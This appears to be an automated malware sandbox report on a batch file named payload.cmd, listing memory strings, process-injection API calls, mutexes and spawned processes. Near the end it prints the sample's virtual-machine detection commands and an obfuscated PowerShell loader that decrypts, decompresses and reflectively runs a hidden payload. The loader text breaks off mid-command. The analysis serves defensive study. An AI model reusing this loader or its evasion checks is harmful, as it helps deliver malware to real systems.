Source: powershell.exe, 00000027.00000002.2262954013.000001909CC89000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/Icon |
Source: powershell.exe, 00000027.00000002.2262954013.000001909CC89000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/License |
Source: powershell.exe, 00000027.00000002.2076913027.000001908CE4D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2289327264.00000190A511C000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://github.com/Pester/Pester |
Source: powershell.exe, 00000027.00000002.2076913027.000001908E0C4000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://go.micro |
Source: powershell.exe, 00000009.00000002.1939727750.000002753CE8B000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2262954013.000001909CC89000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://nuget.org/nuget.exe |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Code function: 39_2_00007FFAAB7A0C5D NtWriteVirtualMemory, |
39_2_00007FFAAB7A0C5D |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Code function: 39_2_00007FFAAB7A0FE4 NtResumeThread, |
39_2_00007FFAAB7A0FE4 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Code function: 39_2_00007FFAAB79DF98 NtUnmapViewOfSection, |
39_2_00007FFAAB79DF98 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Code function: 39_2_00007FFAAB7A0F20 NtSetContextThread, |
39_2_00007FFAAB7A0F20 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Code function: 39_2_00007FFAAB79E078 NtUnmapViewOfSection, |
39_2_00007FFAAB79E078 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Code function: 39_2_00007FFAAB7A0A3E NtUnmapViewOfSection, |
39_2_00007FFAAB7A0A3E |
Source: C:\Windows\System32\dllhost.exe |
Code function: 41_2_0000000140001868 OpenProcess,IsWow64Process,CloseHandle,OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,VirtualFreeEx,CloseHandle,CloseHandle, |
41_2_0000000140001868 |
Source: C:\Windows\System32\winlogon.exe |
Code function: 42_2_000001CA7D1E2C80 TlsGetValue,TlsGetValue,TlsGetValue,NtEnumerateValueKey,NtEnumerateValueKey,NtEnumerateValueKey,TlsSetValue,TlsSetValue,TlsSetValue, |
42_2_000001CA7D1E2C80 |
Source: C:\Windows\System32\lsass.exe |
Code function: 43_2_0000017D2DD52300 NtQuerySystemInformation,StrCmpNIW, |
43_2_0000017D2DD52300 |
Source: C:\Windows\System32\dwm.exe |
Code function: 45_2_00000262F1D02C80 TlsGetValue,TlsGetValue,TlsGetValue,NtEnumerateValueKey,NtEnumerateValueKey,NtEnumerateValueKey,TlsSetValue,TlsSetValue,TlsSetValue, |
45_2_00000262F1D02C80 |
Source: C:\Windows\System32\cmd.exe |
Code function: 20_3_000002527DEBCC94 |
20_3_000002527DEBCC94 |
Source: C:\Windows\System32\cmd.exe |
Code function: 20_3_000002527DEB23F0 |
20_3_000002527DEB23F0 |
Source: C:\Windows\System32\cmd.exe |
Code function: 20_3_000002527DEBCE18 |
20_3_000002527DEBCE18 |
Source: C:\Windows\System32\cmd.exe |
Code function: 20_2_000002527DEED894 |
20_2_000002527DEED894 |
Source: C:\Windows\System32\cmd.exe |
Code function: 20_2_000002527DEE2FF0 |
20_2_000002527DEE2FF0 |
Source: C:\Windows\System32\cmd.exe |
Code function: 20_2_000002527DEEDA18 |
20_2_000002527DEEDA18 |
Source: C:\Windows\System32\cmd.exe |
Code function: 20_2_000002527DF1D894 |
20_2_000002527DF1D894 |
Source: C:\Windows\System32\cmd.exe |
Code function: 20_2_000002527DF12FF0 |
20_2_000002527DF12FF0 |
Source: C:\Windows\System32\cmd.exe |
Code function: 20_2_000002527DF1DA18 |
20_2_000002527DF1DA18 |
Source: C:\Windows\System32\conhost.exe |
Code function: 21_3_00000286D7CECC94 |
21_3_00000286D7CECC94 |
Source: C:\Windows\System32\conhost.exe |
Code function: 21_3_00000286D7CE23F0 |
21_3_00000286D7CE23F0 |
Source: C:\Windows\System32\conhost.exe |
Code function: 21_3_00000286D7CECE18 |
21_3_00000286D7CECE18 |
Source: C:\Windows\System32\conhost.exe |
Code function: 21_2_00000286D7D1D894 |
21_2_00000286D7D1D894 |
Source: C:\Windows\System32\conhost.exe |
Code function: 21_2_00000286D7D12FF0 |
21_2_00000286D7D12FF0 |
Source: C:\Windows\System32\conhost.exe |
Code function: 21_2_00000286D7D1DA18 |
21_2_00000286D7D1DA18 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Code function: 39_2_00007FFAAB79F659 |
39_2_00007FFAAB79F659 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Code function: 39_2_00007FFAAB79DD58 |
39_2_00007FFAAB79DD58 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Code function: 39_2_00007FFAAB79E329 |
39_2_00007FFAAB79E329 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Code function: 39_2_00007FFAAB79FDE9 |
39_2_00007FFAAB79FDE9 |
Source: C:\Windows\System32\conhost.exe |
Code function: 40_3_000001D54780CE18 |
40_3_000001D54780CE18 |
Source: C:\Windows\System32\conhost.exe |
Code function: 40_3_000001D54780CC94 |
40_3_000001D54780CC94 |
Source: C:\Windows\System32\conhost.exe |
Code function: 40_3_000001D5478023F0 |
40_3_000001D5478023F0 |
Source: C:\Windows\System32\conhost.exe |
Code function: 40_2_000001D54783DA18 |
40_2_000001D54783DA18 |
Source: C:\Windows\System32\conhost.exe |
Code function: 40_2_000001D54783D894 |
40_2_000001D54783D894 |
Source: C:\Windows\System32\conhost.exe |
Code function: 40_2_000001D547832FF0 |
40_2_000001D547832FF0 |
Source: C:\Windows\System32\dllhost.exe |
Code function: 41_3_000001EF091FCC94 |
41_3_000001EF091FCC94 |
Source: C:\Windows\System32\dllhost.exe |
Code function: 41_3_000001EF091F23F0 |
41_3_000001EF091F23F0 |
Source: C:\Windows\System32\dllhost.exe |
Code function: 41_3_000001EF091FCE18 |
41_3_000001EF091FCE18 |
Source: C:\Windows\System32\dllhost.exe |
Code function: 41_2_0000000140001CF0 |
41_2_0000000140001CF0 |
Source: C:\Windows\System32\dllhost.exe |
Code function: 41_2_0000000140002D4C |
41_2_0000000140002D4C |
Source: C:\Windows\System32\dllhost.exe |
Code function: 41_2_0000000140003204 |
41_2_0000000140003204 |
Source: C:\Windows\System32\dllhost.exe |
Code function: 41_2_0000000140002434 |
41_2_0000000140002434 |
Source: C:\Windows\System32\dllhost.exe |
Code function: 41_2_0000000140001274 |
41_2_0000000140001274 |
Source: C:\Windows\System32\dllhost.exe |
Code function: 41_2_000001EF0922D894 |
41_2_000001EF0922D894 |
Source: C:\Windows\System32\dllhost.exe |
Code function: 41_2_000001EF09222FF0 |
41_2_000001EF09222FF0 |
Source: C:\Windows\System32\dllhost.exe |
Code function: 41_2_000001EF0922DA18 |
41_2_000001EF0922DA18 |
Source: C:\Windows\System32\dllhost.exe |
Code function: 41_2_000001EF0942D894 |
41_2_000001EF0942D894 |
Source: C:\Windows\System32\dllhost.exe |
Code function: 41_2_000001EF09422FF0 |
41_2_000001EF09422FF0 |
Source: C:\Windows\System32\dllhost.exe |
Code function: 41_2_000001EF0942DA18 |
41_2_000001EF0942DA18 |
Source: C:\Windows\System32\winlogon.exe |
Code function: 42_3_000001CA7D1BCE18 |
42_3_000001CA7D1BCE18 |
Source: C:\Windows\System32\winlogon.exe |
Code function: 42_3_000001CA7D1BCC94 |
42_3_000001CA7D1BCC94 |
Source: C:\Windows\System32\winlogon.exe |
Code function: 42_3_000001CA7D1B23F0 |
42_3_000001CA7D1B23F0 |
Source: C:\Windows\System32\winlogon.exe |
Code function: 42_2_000001CA7D1EDA18 |
42_2_000001CA7D1EDA18 |
Source: C:\Windows\System32\winlogon.exe |
Code function: 42_2_000001CA7D1ED894 |
42_2_000001CA7D1ED894 |
Source: C:\Windows\System32\winlogon.exe |
Code function: 42_2_000001CA7D1E2FF0 |
42_2_000001CA7D1E2FF0 |
Source: C:\Windows\System32\winlogon.exe |
Code function: 42_2_000001CA7D21DA18 |
42_2_000001CA7D21DA18 |
Source: C:\Windows\System32\winlogon.exe |
Code function: 42_2_000001CA7D21D894 |
42_2_000001CA7D21D894 |
Source: C:\Windows\System32\winlogon.exe |
Code function: 42_2_000001CA7D212FF0 |
42_2_000001CA7D212FF0 |
Source: C:\Windows\System32\lsass.exe |
Code function: 43_3_0000017D2DD2CE18 |
43_3_0000017D2DD2CE18 |
Source: C:\Windows\System32\lsass.exe |
Code function: 43_3_0000017D2DD2CC94 |
43_3_0000017D2DD2CC94 |
Source: C:\Windows\System32\lsass.exe |
Code function: 43_3_0000017D2DD223F0 |
43_3_0000017D2DD223F0 |
Source: C:\Windows\System32\lsass.exe |
Code function: 43_2_0000017D2DD5DA18 |
43_2_0000017D2DD5DA18 |
Source: C:\Windows\System32\lsass.exe |
Code function: 43_2_0000017D2DD5D894 |
43_2_0000017D2DD5D894 |
Source: C:\Windows\System32\lsass.exe |
Code function: 43_2_0000017D2DD52FF0 |
43_2_0000017D2DD52FF0 |
Source: C:\Windows\System32\svchost.exe |
Code function: 44_3_0000022F4B9223F0 |
44_3_0000022F4B9223F0 |
Source: C:\Windows\System32\svchost.exe |
Code function: 44_3_0000022F4B92CE18 |
44_3_0000022F4B92CE18 |
Source: C:\Windows\System32\svchost.exe |
Code function: 44_3_0000022F4B92CC94 |
44_3_0000022F4B92CC94 |
Source: C:\Windows\System32\svchost.exe |
Code function: 44_2_0000022F4B922FF0 |
44_2_0000022F4B922FF0 |
Source: C:\Windows\System32\svchost.exe |
Code function: 44_2_0000022F4B92DA18 |
44_2_0000022F4B92DA18 |
Source: C:\Windows\System32\svchost.exe |
Code function: 44_2_0000022F4B92D894 |
44_2_0000022F4B92D894 |
Source: C:\Windows\System32\svchost.exe |
Code function: 44_2_0000022F4B952FF0 |
44_2_0000022F4B952FF0 |
Source: C:\Windows\System32\svchost.exe |
Code function: 44_2_0000022F4B95DA18 |
44_2_0000022F4B95DA18 |
Source: C:\Windows\System32\svchost.exe |
Code function: 44_2_0000022F4B95D894 |
44_2_0000022F4B95D894 |
Source: C:\Windows\System32\dwm.exe |
Code function: 45_3_00000262F1CD23F0 |
45_3_00000262F1CD23F0 |
Source: C:\Windows\System32\dwm.exe |
Code function: 45_3_00000262F1CDCE18 |
45_3_00000262F1CDCE18 |
Source: C:\Windows\System32\dwm.exe |
Code function: 45_3_00000262F1CDCC94 |
45_3_00000262F1CDCC94 |
Source: C:\Windows\System32\dwm.exe |
Code function: 45_3_00000262F1CA23F0 |
45_3_00000262F1CA23F0 |
Source: C:\Windows\System32\dwm.exe |
Code function: 45_3_00000262F1CACE18 |
45_3_00000262F1CACE18 |
Source: C:\Windows\System32\dwm.exe |
Code function: 45_3_00000262F1CACC94 |
45_3_00000262F1CACC94 |
Source: C:\Windows\System32\dwm.exe |
Code function: 45_2_00000262F1CD2FF0 |
45_2_00000262F1CD2FF0 |
Source: C:\Windows\System32\dwm.exe |
Code function: 45_2_00000262F1CDDA18 |
45_2_00000262F1CDDA18 |
Source: C:\Windows\System32\dwm.exe |
Code function: 45_2_00000262F1CDD894 |
45_2_00000262F1CDD894 |
Source: C:\Windows\System32\dwm.exe |
Code function: 45_2_00000262F1D02FF0 |
45_2_00000262F1D02FF0 |
Source: C:\Windows\System32\dwm.exe |
Code function: 45_2_00000262F1D0DA18 |
45_2_00000262F1D0DA18 |
Source: C:\Windows\System32\dwm.exe |
Code function: 45_2_00000262F1D0D894 |
45_2_00000262F1D0D894 |
Source: C:\Windows\System32\svchost.exe |
Code function: 46_3_0000023942AECE18 |
46_3_0000023942AECE18 |
Source: C:\Windows\System32\svchost.exe |
Code function: 46_3_0000023942AE23F0 |
46_3_0000023942AE23F0 |
Source: C:\Windows\System32\svchost.exe |
Code function: 46_3_0000023942AECC94 |
46_3_0000023942AECC94 |
Source: C:\Windows\System32\svchost.exe |
Code function: 46_2_0000023942B1DA18 |
46_2_0000023942B1DA18 |
Source: C:\Windows\System32\svchost.exe |
Code function: 46_2_0000023942B12FF0 |
46_2_0000023942B12FF0 |
Source: C:\Windows\System32\svchost.exe |
Code function: 46_2_0000023942B1D894 |
46_2_0000023942B1D894 |
Source: C:\Windows\System32\svchost.exe |
Code function: 47_3_000001EF056ACC94 |
47_3_000001EF056ACC94 |
Source: C:\Windows\System32\svchost.exe |
Code function: 47_3_000001EF056A23F0 |
47_3_000001EF056A23F0 |
Source: C:\Windows\System32\svchost.exe |
Code function: 47_3_000001EF056ACE18 |
47_3_000001EF056ACE18 |
Source: C:\Windows\System32\svchost.exe |
Code function: 47_2_000001EF056DD894 |
47_2_000001EF056DD894 |
Source: C:\Windows\System32\svchost.exe |
Code function: 47_2_000001EF056D2FF0 |
47_2_000001EF056D2FF0 |
Source: C:\Windows\System32\svchost.exe |
Code function: 47_2_000001EF056DDA18 |
47_2_000001EF056DDA18 |
Source: C:\Windows\System32\svchost.exe |
Code function: 47_2_000001EF0570D894 |
47_2_000001EF0570D894 |
Source: C:\Windows\System32\svchost.exe |
Code function: 47_2_000001EF05702FF0 |
47_2_000001EF05702FF0 |
Source: C:\Windows\System32\svchost.exe |
Code function: 47_2_000001EF0570DA18 |
47_2_000001EF0570DA18 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Mutant created: \Sessions\1\BaseNamedObjects\6273870 |
Source: C:\Windows\System32\conhost.exe |
Mutant created: \BaseNamedObjects\Local\SM0:2332:120:WilError_03 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Mutant created: NULL |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Mutant created: \Sessions\1\BaseNamedObjects\Local\ee0b84a4-b7e5-4383-b65b-82bf094fa75b |
Source: C:\Windows\System32\WerFault.exe |
Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5760 |
Source: C:\Windows\System32\WerFault.exe |
Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2064 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Mutant created: \Sessions\1\BaseNamedObjects\Global\Onimai_3637bd27-1800-4db6-94b5-e49ce9967b2d |
Source: C:\Windows\System32\conhost.exe |
Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5964:120:WilError_03 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Mutant created: \Sessions\1\BaseNamedObjects\2851471 |
Source: C:\Windows\System32\conhost.exe |
Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2440:120:WilError_03 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Mutant created: \Sessions\1\BaseNamedObjects\364263 |
Source: C:\Windows\System32\conhost.exe |
Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3576:120:WilError_03 |
Source: C:\Windows\System32\conhost.exe |
Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4276:120:WilError_03 |
Source: C:\Windows\System32\conhost.exe |
Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2980:120:WilError_03 |
Source: unknown |
Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\payload.cmd" " |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\findstr.exe findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK" |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Manufacturer,Model |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\findstr.exe findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox" |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Users\user\Desktop\payload.cmd';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIM |